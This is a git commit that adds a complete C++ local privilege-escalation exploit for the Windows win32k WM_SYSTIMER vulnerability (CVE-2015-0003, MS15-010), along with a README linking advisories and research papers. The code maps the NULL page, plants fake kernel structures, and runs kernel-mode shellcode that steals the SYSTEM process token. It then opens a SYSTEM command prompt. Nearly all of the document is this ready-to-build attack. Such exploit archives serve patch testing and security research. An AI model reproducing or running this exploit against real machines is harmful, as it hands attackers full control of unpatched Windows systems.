MS15-010

Gitmaninc · Gitmaninc · commit 50dc46dfa163 · 2017-04-22T00:26:37.000-04:00
diff --git a/MS15-010/37098.txt b/MS15-010/37098.txt
@@ -0,0 +1,352 @@
+// ex.cpp
+/*
+	Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP
+	CVE-2015-0003
+	March 2015 (Public Release: May 24, 2015)
+
+	Tested on:
+				x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3
+				x64: Win 2k8 SP1 | Win 2k8 R2 SP1
+
+	Author: Skylake - skylake <at> mail <dot> com
+*/
+
+#include "ex.h"
+
+_ZwAllocateVirtualMemory ZwAllocateVirtualMemory;
+_PsLookupProcessByProcessId PsLookupProcessByProcessId;
+_PsReferencePrimaryToken PsReferencePrimaryToken;
+DWORD Pid;
+ATOM atom;
+BOOL KrnlMode, bSpawned;
+
+DWORD_PTR WINAPI pti()
+{
+#ifdef _M_X64
+	LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 );
+	return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) );
+#else
+	LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 );
+	return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) );
+#endif
+}
+
+BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize )
+{
+	DWORD_PTR dwIndex, dwMask;
+
+#ifdef _M_X64
+	dwMask = ~0xf;
+#else
+	dwMask = ~7;
+#endif
+	//
+	dwCurrentValue &= dwMask;
+
+	for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ )
+	{
+		if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue )
+		{
+			//
+			pdwStructure[dwIndex] = dwNewValue;
+			return TRUE;
+		}
+	}
+
+	return FALSE;
+}
+
+BOOL WINAPI Init()
+{
+	HMODULE hMod = NULL;
+	PVOID Base = NULL;
+	OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) };
+	PSYSTEM_MODULE_INFORMATION pm = NULL;
+	BOOL RetVal = FALSE;
+
+	__try {
+
+		if( !GetVersionEx( &ov ) ) __leave;
+
+		if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 )
+		{
+			atom = 0xc039;
+		}
+
+		else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 )
+		{
+			atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a;
+		}
+
+		if( !atom ) __leave;
+
+		_ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" );
+		if( !ZwQuerySystemInformation ) __leave;
+
+		ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" );
+		if( !ZwAllocateVirtualMemory ) __leave;
+
+		ULONG len;
+		LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len );
+		if( !status ) __leave;
+
+		pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len );
+		if( !pm ) __leave;
+		status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len );
+		if( status ) __leave;
+
+		CHAR szKrnl[MAX_PATH] = { 0 }, *t;
+
+		for( ULONG i = 0; i < pm->Count; ++i )
+		{
+			if( strstr( pm->Module[i].ImageName, "exe" ) )
+			{
+				t = strstr( pm->Module[i].ImageName, "nt" );
+				if( t )
+				{
+					strcpy_s( szKrnl, _countof( szKrnl ) - 1, t );
+					Base = pm->Module[i].Base;
+					break;
+				}
+			}
+		}
+
+		hMod = LoadLibraryA( szKrnl );
+
+		if( !hMod || !Base ) __leave;
+		
+		PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" );
+		if( !PsLookupProcessByProcessId ) __leave;
+
+		PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) );
+
+		PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" );
+
+		if( !PsReferencePrimaryToken ) __leave;
+
+		PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) );
+		Pid = GetCurrentProcessId();
+		RetVal = TRUE;
+	}
+
+	__finally {
+		if( pm ) LocalFree( pm );
+		if( hMod ) FreeLibrary( hMod );
+	}
+
+	return RetVal;
+}
+
+LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam )
+{
+	LPVOID pCurProcess = NULL;
+	LPVOID pSystemInfo = NULL;
+	PACCESS_TOKEN systemToken;
+	PACCESS_TOKEN targetToken;
+
+	PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess );
+	PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo );
+
+	targetToken = PsReferencePrimaryToken( pCurProcess );
+	systemToken = PsReferencePrimaryToken( pSystemInfo );
+
+	//
+	find_and_replace_member( ( PDWORD_PTR ) pCurProcess,
+		( DWORD_PTR ) targetToken,
+		( DWORD_PTR ) systemToken,
+		0x200 );
+	KrnlMode = TRUE;
+	return  0;
+}
+
+VOID WINAPI leave()
+{
+	keybd_event( VK_ESCAPE, 0, 0, NULL );
+	keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL );
+	keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL );
+}
+
+LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam )
+{
+	if( bSpawned )
+	{
+		leave();
+		ExitProcess( 0 );
+	}
+
+	switch( message )
+	{
+	case WM_CREATE:
+		SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL );
+		FlashWindow( hWnd, TRUE );
+		keybd_event( VK_LWIN, 0, 0, NULL );
+		break;
+	case WM_CLOSE:
+		DestroyWindow( hWnd );
+		break;
+	case WM_DESTROY:
+		PostQuitMessage( 0 );
+		break;
+	case WM_TIMER:
+		KillTimer( hWnd, ID_TIMER );
+		leave();
+		DestroyWindow( hWnd );
+		break;
+	default:
+		return DefWindowProc( hWnd, message, wParam, lParam );
+	}
+	return 0;
+}
+
+int APIENTRY _tWinMain( _In_ HINSTANCE hInstance,
+	_In_opt_ HINSTANCE hPrevInstance,
+	_In_ LPTSTR    lpCmdLine,
+	_In_ int       nCmdShow )
+{
+	WNDCLASSEX wc = { sizeof( WNDCLASSEX ) };
+	HWND hWnd = NULL;
+	MSG Msg = { 0 };
+
+	SIZE_T size = 0x1000;
+	LPVOID addr = ( LPVOID ) 1;
+
+	if( !Init() ) return 1;
+	
+	if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) )
+	{
+		//
+		return 1;
+	}
+
+	DWORD_PTR p = pti();
+	if( !p ) return 1;
+
+#ifdef _M_X64
+	*( ( PDWORD_PTR ) 0x10 ) = p;
+	*( ( LPBYTE ) 0x2a ) = 4;
+	*( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode;
+	*( ( PDWORD_PTR ) 0xa8 ) = 0x400;
+	*( ( LPDWORD ) 0x404 ) = 1;
+	*( ( PDWORD_PTR ) 0x408 ) = 0x800;
+	*( ( LPWORD ) 0x410 ) = atom;
+	*( ( LPBYTE ) 0x412 ) = 1;
+#else
+	*( ( LPDWORD ) 0x08 ) = p;
+	*( ( LPBYTE ) 0x16 ) = 4;
+	*( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode;
+	*( ( LPDWORD ) 0x6c ) = 0x400;
+	*( ( LPDWORD ) 0x404 ) = 1;
+	*( ( LPDWORD ) 0x408 ) = 0x800;
+	*( ( LPWORD ) 0x40c ) = atom;
+	*( ( LPBYTE ) 0x40e ) = 1;
+#endif
+
+	wc.lpfnWndProc = WndProc;
+	wc.hInstance = hInstance;
+	wc.lpszClassName = TEXT( "Class" );
+	
+	if( !RegisterClassEx( &wc ) )
+		return 1;
+	hWnd = CreateWindowEx(
+		WS_EX_CLIENTEDGE,
+		TEXT( "Class" ),
+		TEXT( "Window" ),
+		WS_OVERLAPPEDWINDOW,
+		CW_USEDEFAULT, CW_USEDEFAULT, 200, 100,
+		NULL, NULL, hInstance, NULL );
+	if( !hWnd )
+		return 1;
+	ShowWindow( hWnd, SW_HIDE );
+	UpdateWindow( hWnd );
+
+	while( GetMessage( &Msg, NULL, 0, 0 ) )
+	{
+		if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010
+		{
+			if( !KrnlMode )
+			{
+				Msg.hwnd = ( HWND ) NULL;
+			}
+			else
+			{
+				Msg.hwnd = hWnd;
+				if( !bSpawned )
+				{
+					ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW );
+					bSpawned = TRUE;
+				}
+			}
+		}
+
+		TranslateMessage( &Msg );
+		DispatchMessage( &Msg );
+	}
+
+	return ( int ) Msg.wParam;
+}
+// EOF
+
+
+
+
+
+
+//ex.h
+
+#pragma once
+
+#include <windows.h>
+#include <stdio.h>
+#include <tchar.h>
+
+typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) (
+	_In_    HANDLE    ProcessHandle,
+	_Inout_ PVOID     *BaseAddress,
+	_In_    ULONG_PTR ZeroBits,
+	_Inout_ PSIZE_T   RegionSize,
+	_In_    ULONG     AllocationType,
+	_In_    ULONG     Protect
+	);
+
+typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) (
+	_In_  HANDLE ProcessId,
+	_Out_ PVOID  *Process
+	);
+
+typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) (
+	_Inout_ PVOID Process
+	);
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+	SystemBasicInformation = 0,
+	SystemModuleInformation = 11
+} SYSTEM_INFORMATION_CLASS;
+
+typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) (
+	_In_      SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	_Inout_   PVOID                    SystemInformation,
+	_In_      ULONG                    SystemInformationLength,
+	_Out_opt_ PULONG                   ReturnLength
+	);
+
+typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
+	HANDLE Section;
+	PVOID  MappedBase;
+	PVOID  Base;
+	ULONG  Size;
+	ULONG  Flags;
+	USHORT LoadOrderIndex;
+	USHORT InitOrderIndex;
+	USHORT LoadCount;
+	USHORT PathLength;
+	CHAR   ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
+
+typedef struct _SYSTEM_MODULE_INFORMATION {
+	ULONG Count;
+	SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+#define ID_TIMER    0x1
+#define WM_SYSTIMER 0x118
+// EOF
diff --git a/MS15-010/CVE-2015-0057.zip b/MS15-010/CVE-2015-0057.zip
diff --git a/MS15-010/README.md b/MS15-010/README.md
@@ -0,0 +1,15 @@
+# MS15-010
+
+- The POC was from [@Offensive Security](https://github.com/offensive-security/exploit-database-bin-sploits/tree/master/sploits)
+
+
+Vulnerability reference:
+ * [MS15-010](https://technet.microsoft.com/en-us/library/security/ms15-010.aspx)
+ * [CVE-2015-0003](https://www.exploit-db.com/exploits/37098/)
+ 
+
+### Links
+
+* [Dyre Banking Trojan Exploits CVE-2015-0057](https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html)
+* [Windows 8 Heap Internals](http://illmatics.com/Windows%208%20Heap%20Internals.pdf)
+* [Kernel Attacks through User-Mode Callbacks](https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf)
